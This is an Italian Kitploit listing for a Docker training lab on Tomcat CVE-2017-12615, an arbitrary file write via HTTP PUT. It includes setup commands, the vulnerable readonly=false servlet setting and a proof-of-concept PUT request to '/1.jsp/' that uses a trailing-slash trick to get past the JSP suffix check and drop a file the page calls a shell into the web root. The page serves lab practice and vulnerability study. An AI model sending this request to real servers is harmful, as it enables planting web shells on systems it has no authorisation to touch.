Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Tomcat-CVE-2017-12615 — Ambiente lab basato su Docker per sfruttare la scrittura arbitraria di file su Tomcat CVE-2017-12615 tramite il metodo PUT, con tecniche di bypass e codice proof-of-concept. | Kitploit
Strumenti/GitHubGitHub/cyberharsh/tomcat-cve-2017-12615
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubcyberharsh/tomcat-cve-2017-12615

Tomcat-CVE-2017-12615

Ambiente lab basato su Docker per sfruttare la scrittura arbitraria di file su Tomcat CVE-2017-12615 tramite il metodo PUT, con tecniche di bypass e codice proof-of-concept.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
6 anni faNon ancora revisionato

Vulnerabilità di scrittura arbitraria di file in Tomcat tramite metodo PUT (CVE-2017-12615)

中文版本(Chinese version)

Versione Tomcat: 8.5.19

Configurazione dell'ambiente

root@kitploit:~
docker-compose build
docker-compose up -d

Dopo aver eseguito con successo i comandi sopra, vedrai la pagina di esempio di Tomcat visitando il sito http://your-ip:8080.

Spiegazione

Link di riferimento:

  • http://wooyun.jozxing.cc/static/bugs/wooyun-2015-0107097.html
  • https://mp.weixin.qq.com/s?__biz=MzI1NDg4MTIxMw==&mid=2247483659&idx=1&sn=c23b3a3b3b43d70999bdbe644e79f7e5
  • https://mp.weixin.qq.com/s?__biz=MzU3ODAyMjg4OQ==&mid=2247483805&idx=1&sn=503a3e29165d57d3c20ced671761bb5e

Tomcat imposta il permesso di scrittura (readonly=false), il che porta alla possibilità di scrivere file sul server.

root@kitploit:~
<servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
        <param-name>debug</param-name>
        <param-value>0</param-value>
    </init-param>
    <init-param>
        <param-name>listings</param-name>
        <param-value>false</param-value>
    </init-param>
    <init-param>
        <param-name>readonly</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>

Sebbene Tomcat controlli in parte il suffisso del file (non è possibile scrivere direttamente file jsp), possiamo comunque bypassare la limitazione attraverso alcune caratteristiche del filesystem (come l'uso di / in Linux).

POC

Invia i seguenti pacchetti direttamente e poi la shell verrà scritta nella directory root del web.

root@kitploit:~
PUT /1.jsp/ HTTP/1.1
Host: your-ip:8080
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

shell

Come segue:

Scarica lo strumento